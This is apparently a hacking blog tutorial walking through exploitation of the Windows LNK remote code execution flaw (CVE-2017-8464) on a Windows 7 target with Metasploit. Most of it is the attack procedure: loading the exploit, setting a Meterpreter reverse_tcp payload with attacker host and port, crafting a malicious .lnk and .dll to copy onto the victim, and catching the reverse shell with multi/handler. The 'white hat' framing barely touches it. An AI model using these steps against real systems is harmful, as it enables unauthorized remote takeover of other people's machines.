Hello, wonderful people! This is your friend, Ashish. Today, we'll hack a Windows 7 machine with a relatively new vulnerability called LNK RCE in Windows.Being a white hat, I have to be in the practice of finding new vulnerabilities but also in the practice of knowing the exploitation of newly discovered vulnerabilities. And that's what I want from you wonderful hackers!
Always go for exploit-db.
It has a huge variety of stuff out there for you, such as exploits, white papers, and other worthy stuff.
Where Did I Get This CVE From?
I was just searching for a newly discovered vulnerability by someone and found this on exploit-db. Here's the link:cve-2017-8464
Before jumping into the exploit, let's first understand what the .LNK is. It is basically a shortcut which, behind the scenes, points to an executable. I am sure you have seen this somewhere or another in your system!
What Does This Exploit Actually Exploit?
About the CVE: This vulnerability exists in the Windows shell, which allows a remote attacker or a local user to execute remote commands on the machine using a specially hacker-crafted LNK file. With this, you can exploit the following machines:Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016. Today, we'll exploit a Windows 7 machine!
And that too this a Metasploit
In a very understandable manner, this kind of vulnerability is exploited by not properly handling data or input. In this case, the parser or the Windows File Explorer fails to do the same and thus results in an RCE
Setups: Windows 7 (Target machine), Linux (Attacker machine) Metasploit installed.
1. Download the exploit and add it into Metasploit. Now, if you don't know how to add it, have a look at my video at my Youtube channel: How to add exploit to Metasploit
2. Now, open up msfconsole and use the added exploit.Command: use exploit/windows/exploitname3
. Use a meterpreter payload and get a meterpreter shell.Command: set payload windows/meterpreter/reverse_tcp4
. Now, the most important part: creating the lnk shortcut. We'll use the exploit in a manner to create an lnk for any except a C: drives shortcut. In this case, I'll build the E: drive lnk, and after building the targeted lnk, I'll copy both the lnk and a dll file to the target host, and boom, exploited.Commands: first add your IP and port to the payload, SET LHOST <your ip>, SET LPORT <Your port>, then type exploit and click enter. At this time, your files will be created like this:
5. Now, close all your terminal windows up until now and open another msfconsole. And this time, use the exploit multi/handler, and add the previous payload to that with your IP and port.Commands: use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset LHOST <Your ip>, set LPORT <Your port>.
After you've successfully copied the right lnk and dll to your target, in the terminal, type and click exploit.BOOM BOOM BOOM BOOM.............................. Exploited and thus, you've gained a reverse tcp shell:
If you are not able to grasp much with this, have a look at my video:How to hack any Windows machine
Hack like a pro and keep practicing!